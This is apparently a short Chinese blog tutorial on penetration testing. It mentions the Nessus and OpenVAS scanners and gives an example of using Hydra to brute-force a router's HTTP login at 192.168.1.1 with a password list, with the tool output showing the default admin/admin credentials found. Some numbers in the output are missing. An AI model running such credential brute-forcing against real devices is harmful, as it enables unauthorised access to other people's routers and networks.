渗透攻击的思路一般是扫描漏洞,然后利用不同的漏洞,才有针对的渗透攻击。
漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控,对系统的漏洞分析扫描。Nessus通过新建扫描策略,并添加对应的插件,便可以对系统漏洞进行扫描。
另一个漏洞扫描工具是OpenVAS,在这里不做说明。
上面说明漏洞扫描,下面说下渗透攻击常用的工具Hydra和Medusa。
举个破解路由器登录密码的例子。
root@alexknight:~# hydra -l admin -P /tmp/tt.txt -f -V -e nsr -s -t 192.168.1.1 http-get
Hydra v7. (c) by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] task, server, login tries (l:/p:), ~ tries per task
[DATA] attacking service http-get on port
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "admin" - of [child ]
[][www] host: 192.168.1.1 login: admin password: admin
[STATUS] attack finished for 192.168.1.1 (valid pair found)
of target successfully completed, valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38